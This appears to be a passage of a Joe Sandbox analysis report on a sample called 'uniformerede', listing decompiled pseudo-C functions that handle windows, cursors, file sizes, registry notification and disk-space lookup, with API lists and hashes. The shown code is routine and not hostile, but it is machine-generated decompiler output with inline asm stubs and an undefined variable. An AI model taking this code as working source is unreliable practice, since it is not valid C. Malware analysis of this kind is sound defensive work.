                                                                                                                                                                                                                            0x0043924b
                                                                                                                                                                                                                            0x0043924b
                                                                                                                                                                                                                            0x0043923e
                                                                                                                                                                                                                            0x0043926d
                                                                                                                                                                                                                            0x00439277
                                                                                                                                                                                                                            0x0043927c
                                                                                                                                                                                                                            0x00439283
                                                                                                                                                                                                                            0x00439285
                                                                                                                                                                                                                            0x0043928b
                                                                                                                                                                                                                            0x00439298
                                                                                                                                                                                                                            0x0043929d
                                                                                                                                                                                                                            0x0043929d
                                                                                                                                                                                                                            0x004392a9
                                                                                                                                                                                                                            0x004392ae
                                                                                                                                                                                                                            0x004392ba
                                                                                                                                                                                                                            0x004392c1
                                                                                                                                                                                                                            0x004392c1
                                                                                                                                                                                                                            0x004392cb

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCursorPos.USER32(0049EB44), ref: 0043917D
                                                                                                                                                                                                                            • GetCursor.USER32(0049EB44), ref: 00439199
                                                                                                                                                                                                                              • Part of subcall function 00438388: SetCapture.USER32(00000000,?,004391AD,0049EB44), ref: 00438397
                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 0043928B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Cursor$CaptureDesktopWindow
                                                                                                                                                                                                                            • String ID: `C
                                                                                                                                                                                                                            • API String ID: 669539147-1847193361
                                                                                                                                                                                                                            • Opcode ID: 98fd7e759f67c62797e9628fe46d91982c6997d9d0034bbc864d442d377a4d8e
                                                                                                                                                                                                                            • Instruction ID: c6ff30aa0831a605475be7d7daa41799f87f77b36a22a6f0c8b6adc85e5341f0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98fd7e759f67c62797e9628fe46d91982c6997d9d0034bbc864d442d377a4d8e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D441BE716096009FD304DF2ED948616BBE1FB88310F1989BFE44A8B3A1DB75EC41CB4A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004412BC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004412BC(void* __eax, intOrPtr __ecx, intOrPtr __edx) {
				char _t23;
				struct HWND__* _t42;
				void* _t43;
				intOrPtr _t47;
				void* _t54;
				void* _t56;
				void* _t57;
				void* _t58;
				intOrPtr* _t59;

				 *((intOrPtr*)(_t59 + 4)) = __ecx;
				 *_t59 = __edx;
				_t54 = __eax;
				_t42 =  *(__eax + 0x180);
				if(_t42 == 0 || IsWindowVisible(_t42) == 0) {
					_t23 = 0;
				} else {
					_t23 = 1;
				}
				 *((char*)(_t59 + 8)) = _t23;
				if( *((char*)(_t59 + 8)) != 0) {
					ScrollWindow( *(_t54 + 0x180),  *(_t59 + 0xc),  *(_t59 + 0xc), 0, 0);
				}
				_t56 = E0043E434(_t54) - 1;
				if(_t56 < 0) {
					L14:
					return E0043DFC4();
				} else {
					_t57 = _t56 + 1;
					_t58 = 0;
					do {
						_t43 = E0043E3F8(_t54, _t58);
						_t47 =  *0x437498; // 0x4374e4
						if(E00403D78(_t43, _t47) == 0 ||  *(_t43 + 0x180) == 0) {
							 *((intOrPtr*)(_t43 + 0x40)) =  *((intOrPtr*)(_t43 + 0x40)) +  *_t59;
							 *((intOrPtr*)(_t43 + 0x44)) =  *((intOrPtr*)(_t43 + 0x44)) +  *((intOrPtr*)(_t59 + 4));
						} else {
							if( *((char*)(_t59 + 8)) == 0) {
								SetWindowPos( *(_t43 + 0x180), 0,  *((intOrPtr*)(_t43 + 0x40)) +  *((intOrPtr*)(_t59 + 0x10)),  *((intOrPtr*)(_t34 + 0x44)) +  *((intOrPtr*)(_t59 + 0x10)),  *(_t34 + 0x48),  *(_t34 + 0x4c), 0x14);
							}
						}
						_t58 = _t58 + 1;
						_t57 = _t57 - 1;
					} while (_t57 != 0);
					goto L14;
				}
			}












                                                                                                                                                                                                                            0x004412c3
                                                                                                                                                                                                                            0x004412c7
                                                                                                                                                                                                                            0x004412ca
                                                                                                                                                                                                                            0x004412cc
                                                                                                                                                                                                                            0x004412d4
                                                                                                                                                                                                                            0x004412e0
                                                                                                                                                                                                                            0x004412e4
                                                                                                                                                                                                                            0x004412e4
                                                                                                                                                                                                                            0x004412e4
                                                                                                                                                                                                                            0x004412e6
                                                                                                                                                                                                                            0x004412ef
                                                                                                                                                                                                                            0x00441306
                                                                                                                                                                                                                            0x00441306
                                                                                                                                                                                                                            0x00441314
                                                                                                                                                                                                                            0x00441317
                                                                                                                                                                                                                            0x00441385
                                                                                                                                                                                                                            0x00441393
                                                                                                                                                                                                                            0x00441319
                                                                                                                                                                                                                            0x00441319
                                                                                                                                                                                                                            0x0044131a
                                                                                                                                                                                                                            0x0044131c
                                                                                                                                                                                                                            0x00441325
                                                                                                                                                                                                                            0x00441329
                                                                                                                                                                                                                            0x00441336
                                                                                                                                                                                                                            0x00441344
                                                                                                                                                                                                                            0x0044134b
                                                                                                                                                                                                                            0x00441350
                                                                                                                                                                                                                            0x00441355
                                                                                                                                                                                                                            0x0044137c
                                                                                                                                                                                                                            0x0044137c
                                                                                                                                                                                                                            0x00441355
                                                                                                                                                                                                                            0x00441381
                                                                                                                                                                                                                            0x00441382
                                                                                                                                                                                                                            0x00441382
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044131c

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 004412D7
                                                                                                                                                                                                                            • ScrollWindow.USER32 ref: 00441306
                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0044137C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$ScrollVisible
                                                                                                                                                                                                                            • String ID: tC
                                                                                                                                                                                                                            • API String ID: 4127837035-1085749316
                                                                                                                                                                                                                            • Opcode ID: d061b127602184be2c9b7ae61929e2cc317074fc455f50c5d15f50e3c6057b0d
                                                                                                                                                                                                                            • Instruction ID: d3335ac6ad808ac153b7fdabc62b5b7bad948aac8996c4e76790ef358f9a02f4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d061b127602184be2c9b7ae61929e2cc317074fc455f50c5d15f50e3c6057b0d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA219F71704700AFE710DF6AC880B6B77D4AF88754F14856EFA48CB262D738EC45875A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0047D01C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,00000000,0047D0D2), ref: 0047D05E
                                                                                                                                                                                                                            • GetFileSize.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,0047D0B5,?,00000000,80000000,00000001,00000000), ref: 0047D096
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,0047D0BC,00000000,00000000,00000000,00000000,00000000,0047D0B5,?,00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 0047D0AF
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                            • String ID: lI
                                                                                                                                                                                                                            • API String ID: 1378416451-2224401619
                                                                                                                                                                                                                            • Opcode ID: 65a7822fe3a389ac1c9a09b887512d4a6e3414963bc98b9a02b16acb343bd438
                                                                                                                                                                                                                            • Instruction ID: 286afb8c99021898e2bdb5b6e8095afefc1f981a6a11c4acb5445e704e613de7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 65a7822fe3a389ac1c9a09b887512d4a6e3414963bc98b9a02b16acb343bd438
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D6117970A04204BFEB11DBA9CC52F5AB7B8EB09704F5184B6FA14E76D0DA79AD108A18
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00494694 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E00494694(void* __eax) {
				long _t18;
				void* _t20;
				void* _t21;

				_t21 = __eax;
				 *((intOrPtr*)(__eax + 0x48)) = 5;
				 *(_t21 + 0x50) = CreateEventA(0, 0xffffffff, 0, 0);
				 *((intOrPtr*)(_t21 + 0x4c)) = CreateEventA(0, 0xffffffff, 0, 0);
				asm("cmc");
				asm("sbb eax, eax");
				_t18 = RegNotifyChangeKeyValue( *( *((intOrPtr*)(_t21 + 0x40)) + 4),  *(_t21 + 0x44),  *(_t21 + 0x48),  *(_t21 + 0x50), 0xffffffff);
				if(_t18 != 0) {
					_t20 = E0040D144("Can not start monitoring", 1);
					E00404378();
					return _t20;
				}
				return _t18;
			}






                                                                                                                                                                                                                            0x00494695
                                                                                                                                                                                                                            0x00494697
                                                                                                                                                                                                                            0x004946ab
                                                                                                                                                                                                                            0x004946bb
                                                                                                                                                                                                                            0x004946cf
                                                                                                                                                                                                                            0x004946d0
                                                                                                                                                                                                                            0x004946da
                                                                                                                                                                                                                            0x004946e1
                                                                                                                                                                                                                            0x004946ef
                                                                                                                                                                                                                            0x004946f4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004946f4
                                                                                                                                                                                                                            0x004946fa

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946A6
                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000,00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946B6
                                                                                                                                                                                                                            • RegNotifyChangeKeyValue.ADVAPI32(?,?,00000005,?,000000FF,00000000,000000FF,00000000,00000000,00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946DA
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • Can not start monitoring, xrefs: 004946E3
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateEvent$ChangeNotifyValue
                                                                                                                                                                                                                            • String ID: Can not start monitoring
                                                                                                                                                                                                                            • API String ID: 2233126570-3835272546
                                                                                                                                                                                                                            • Opcode ID: 120cc25bb99064d1f3d8207132df81e4059a6af6159ea2c50c9c4d4b7a5d7901
                                                                                                                                                                                                                            • Instruction ID: 443d9707a36d2025ed6040a5d28f1c7387ed03c1380d4d8ed495eb8cf4c6426e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 120cc25bb99064d1f3d8207132df81e4059a6af6159ea2c50c9c4d4b7a5d7901
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02F0F4B06442016FDB54DFADCC85F1537A46F05715F1102A5FB14DF2D6E675DC048714
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00442ECC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00442ECC(struct HWND__* __eax, intOrPtr __ecx, char __edx, char _a4) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				intOrPtr _t19;
				struct HWND__* _t20;
				intOrPtr* _t23;

				_t20 = __eax;
				_t1 =  &_a4; // 0x443144
				_t23 =  *_t1;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 =  &_v12; // 0x443144
				ClientToScreen(__eax, _t4);
				GetWindowRect(_t20,  &_v28);
				_t6 =  &_v12; // 0x443144
				 *_t23 =  *_t6 - _v28.left;
				_t19 = _v8 - _v28.top;
				 *((intOrPtr*)(_t23 + 4)) = _t19;
				return _t19;
			}









                                                                                                                                                                                                                            0x00442ed4
                                                                                                                                                                                                                            0x00442ed6
                                                                                                                                                                                                                            0x00442ed6
                                                                                                                                                                                                                            0x00442ed9
                                                                                                                                                                                                                            0x00442edc
                                                                                                                                                                                                                            0x00442edf
                                                                                                                                                                                                                            0x00442ee4
                                                                                                                                                                                                                            0x00442eee
                                                                                                                                                                                                                            0x00442ef3
                                                                                                                                                                                                                            0x00442ef9
                                                                                                                                                                                                                            0x00442efe
                                                                                                                                                                                                                            0x00442f01
                                                                                                                                                                                                                            0x00442f09

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ClientRectScreenWindow
                                                                                                                                                                                                                            • String ID: D1D$D1D
                                                                                                                                                                                                                            • API String ID: 3371951266-2689743835
                                                                                                                                                                                                                            • Opcode ID: 633562e4aab1e9921d1e3a8e725f7fe5ddc9f249ff15e542360de7e665a61ded
                                                                                                                                                                                                                            • Instruction ID: 696a0ad0a36b5a628bc16ef9a9fef7e4a028d98c1b31806480246e0535002fd9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 633562e4aab1e9921d1e3a8e725f7fe5ddc9f249ff15e542360de7e665a61ded
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4DF0A2B5D0420DAFCB00DFE9C9818DEFBFCEB08250F10456AA945F3741E630AA408BA5
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040E884 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040E884() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x49b158 = _t1;
				}
				if( *0x49b158 == 0) {
					 *0x49b158 = E00409ED4;
					return E00409ED4;
				}
				return _t1;
			}





                                                                                                                                                                                                                            0x0040e88a
                                                                                                                                                                                                                            0x0040e88f
                                                                                                                                                                                                                            0x0040e893
                                                                                                                                                                                                                            0x0040e89b
                                                                                                                                                                                                                            0x0040e8a0
                                                                                                                                                                                                                            0x0040e8a0
                                                                                                                                                                                                                            0x0040e8ac
                                                                                                                                                                                                                            0x0040e8b3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040e8b3
                                                                                                                                                                                                                            0x0040e8b9

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040F2ED,00000000,0040F300), ref: 0040E88A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040E89B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                            • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                                                                            • API String ID: 1646373207-3712701948
                                                                                                                                                                                                                            • Opcode ID: 43ed1c233b8431e60244e37b4123486ffc539a6091bd58410c1b071844e72ba0
                                                                                                                                                                                                                            • Instruction ID: 06fc51cb68962c5c382d4d7a2f86af93b26a51ec458fff072f92dd4ff1898c2b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43ed1c233b8431e60244e37b4123486ffc539a6091bd58410c1b071844e72ba0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CFD09E62A043C55AF700BBA6A9EA7162658D720344B24C83BA000773D2D7FD4C94979D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00438E8C Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                            			E00438E8C(intOrPtr* __eax, signed int __edx) {
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr* _t60;
				intOrPtr* _t62;
				struct HICON__* _t65;
				intOrPtr _t67;
				intOrPtr* _t72;
				intOrPtr _t74;
				intOrPtr* _t75;
				intOrPtr _t78;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t85;
				struct HWND__* _t88;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr* _t93;
				intOrPtr _t97;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t106;
				struct HWND__* _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr _t114;
				intOrPtr _t117;
				char _t118;
				intOrPtr _t119;
				void* _t131;
				intOrPtr _t135;
				intOrPtr _t140;
				intOrPtr* _t155;
				void* _t158;
				void* _t165;
				void* _t166;

				_t155 = __eax;
				if( *0x49eb54 != 0) {
					L3:
					_t49 =  *0x49eb34; // 0x0
					_t50 =  *0x49eb34; // 0x0
					_t117 = E00438D6C(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
					if( *0x49eb54 == 0) {
						_t168 =  *0x49eb58;
						if( *0x49eb58 != 0) {
							_t106 =  *0x49eb48; // 0x0
							_t107 = GetDesktopWindow();
							_t108 =  *0x49eb58; // 0x0
							E00443038(_t108, _t107, _t168, _t106);
						}
					}
					_t53 =  *0x49eb34; // 0x0
					if( *((char*)(_t53 + 0x9b)) != 0) {
						__eflags =  *0x49eb54;
						_t6 =  &_v24;
						 *_t6 =  *0x49eb54 != 0;
						__eflags =  *_t6;
						 *0x49eb54 = 2;
					} else {
						 *0x49eb54 = 1;
						_v24 = 0;
					}
					_t54 =  *0x49eb38; // 0x0
					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
						L12:
						_t55 =  *0x49eb38; // 0x0
						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
						_t56 =  *0x49eb38; // 0x0
						if( *((intOrPtr*)(_t56 + 4)) != 0) {
							_t97 =  *0x49eb38; // 0x0
							E0043AAC0( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
							_t100 =  *0x49eb38; // 0x0
							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
						}
						_t131 = E00438DBC(2);
						_t121 =  *_t155;
						_t60 =  *0x49eb38; // 0x0
						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
						if( *0x49eb58 != 0) {
							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
								_t82 =  *0x49eb58; // 0x0
								E00443020(_t82, _t158);
								_t84 =  *0x49eb58; // 0x0
								_t177 =  *((char*)(_t84 + 0x6a));
								if( *((char*)(_t84 + 0x6a)) != 0) {
									_t121 =  *((intOrPtr*)(_t155 + 4));
									_t85 =  *0x49eb58; // 0x0
									E00443120(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
								} else {
									_t88 = GetDesktopWindow();
									_t121 =  *_t155;
									_t89 =  *0x49eb58; // 0x0
									E00443038(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
								}
							} else {
								_t91 =  *0x49eb58; // 0x0
								E00443194(_t91, _t131, __eflags);
								_t93 =  *0x49de0c; // 0x49ebbc
								SetCursor(E004586EC( *_t93, _t158));
							}
						}
						_t62 =  *0x49de0c; // 0x49ebbc
						_t65 = SetCursor(E004586EC( *_t62, _t158));
						if( *0x49eb54 != 2) {
							L32:
							return _t65;
						} else {
							_t179 = _t117;
							if(_t117 != 0) {
								_t118 = E00438DF8(_t121);
								_t67 =  *0x49eb38; // 0x0
								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
								__eflags = _t118;
								if(__eflags != 0) {
									E0043AAC0(_t118,  &_v24, _t155);
									_t65 = E00403DE8(_t118, __eflags);
									_t135 =  *0x49eb38; // 0x0
									 *(_t135 + 0x54) = _t65;
								} else {
									_t78 =  *0x49eb38; // 0x0
									_t65 = E00403DE8( *((intOrPtr*)(_t78 + 4)), __eflags);
									_t140 =  *0x49eb38; // 0x0
									 *(_t140 + 0x54) = _t65;
								}
							} else {
								_push( *((intOrPtr*)(_t155 + 4)));
								_t80 =  *0x49eb38; // 0x0
								_t65 = E00403DE8( *((intOrPtr*)(_t80 + 0x38)), _t179);
							}
							if( *0x49eb38 == 0) {
								goto L32;
							} else {
								_t119 =  *0x49eb38; // 0x0
								_t41 = _t119 + 0x5c; // 0x5c
								_t42 = _t119 + 0x44; // 0x44
								_t65 = E00408E50(_t42, 0x10, _t41);
								if(_t65 != 0) {
									goto L32;
								}
								if(_v28 != 0) {
									_t75 =  *0x49eb38; // 0x0
									 *((intOrPtr*)( *_t75 + 0x34))();
								}
								_t72 =  *0x49eb38; // 0x0
								 *((intOrPtr*)( *_t72 + 0x30))();
								_t74 =  *0x49eb38; // 0x0
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								return _t74;
							}
						}
					}
					_t65 = E00438DBC(1);
					if( *0x49eb38 == 0) {
						goto L32;
					}
					_t102 =  *0x49eb38; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t117;
					_t103 =  *0x49eb38; // 0x0
					 *((intOrPtr*)(_t103 + 8)) = _v28;
					_t104 =  *0x49eb38; // 0x0
					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
					_t65 = E00438DBC(0);
					if( *0x49eb38 == 0) {
						goto L32;
					}
					goto L12;
				}
				_t110 =  *0x49eb44; // 0x0
				asm("cdq");
				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x49eb50; // 0x0
				if(_t165 >= 0) {
					goto L3;
				}
				_t114 =  *0x49eb48; // 0x0
				asm("cdq");
				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
				_t166 = _t65 -  *0x49eb50; // 0x0
				if(_t166 < 0) {
					goto L32;
				}
				goto L3;
			}

















































                                                                                                                                                                                                                            0x00438e92
                                                                                                                                                                                                                            0x00438e9b
                                                                                                                                                                                                                            0x00438eca
                                                                                                                                                                                                                            0x00438eca
                                                                                                                                                                                                                            0x00438ed0
                                                                                                                                                                                                                            0x00438ee6
                                                                                                                                                                                                                            0x00438eef
                                                                                                                                                                                                                            0x00438ef1
                                                                                                                                                                                                                            0x00438ef8
                                                                                                                                                                                                                            0x00438efa
                                                                                                                                                                                                                            0x00438f00
                                                                                                                                                                                                                            0x00438f0d
                                                                                                                                                                                                                            0x00438f12
                                                                                                                                                                                                                            0x00438f12
                                                                                                                                                                                                                            0x00438ef8
                                                                                                                                                                                                                            0x00438f17
                                                                                                                                                                                                                            0x00438f23
                                                                                                                                                                                                                            0x00438f33
                                                                                                                                                                                                                            0x00438f3a
                                                                                                                                                                                                                            0x00438f3a
                                                                                                                                                                                                                            0x00438f3a
                                                                                                                                                                                                                            0x00438f3f
                                                                                                                                                                                                                            0x00438f25
                                                                                                                                                                                                                            0x00438f25
                                                                                                                                                                                                                            0x00438f2c
                                                                                                                                                                                                                            0x00438f2c
                                                                                                                                                                                                                            0x00438f46
                                                                                                                                                                                                                            0x00438f4e
                                                                                                                                                                                                                            0x00438f9b
                                                                                                                                                                                                                            0x00438f9b
                                                                                                                                                                                                                            0x00438fa2
                                                                                                                                                                                                                            0x00438fa8
                                                                                                                                                                                                                            0x00438fab
                                                                                                                                                                                                                            0x00438fb4
                                                                                                                                                                                                                            0x00438fbc
                                                                                                                                                                                                                            0x00438fc4
                                                                                                                                                                                                                            0x00438fc9
                                                                                                                                                                                                                            0x00438fd2
                                                                                                                                                                                                                            0x00438fd9
                                                                                                                                                                                                                            0x00438fd9
                                                                                                                                                                                                                            0x00438fe7
                                                                                                                                                                                                                            0x00438fe9
                                                                                                                                                                                                                            0x00438feb
                                                                                                                                                                                                                            0x00438ff5
                                                                                                                                                                                                                            0x00438ffe
                                                                                                                                                                                                                            0x00439002
                                                                                                                                                                                                                            0x0043900c
                                                                                                                                                                                                                            0x00439011
                                                                                                                                                                                                                            0x00439016
                                                                                                                                                                                                                            0x0043901b
                                                                                                                                                                                                                            0x0043901f
                                                                                                                                                                                                                            0x0043903a
                                                                                                                                                                                                                            0x0043903f
                                                                                                                                                                                                                            0x00439044
                                                                                                                                                                                                                            0x00439021
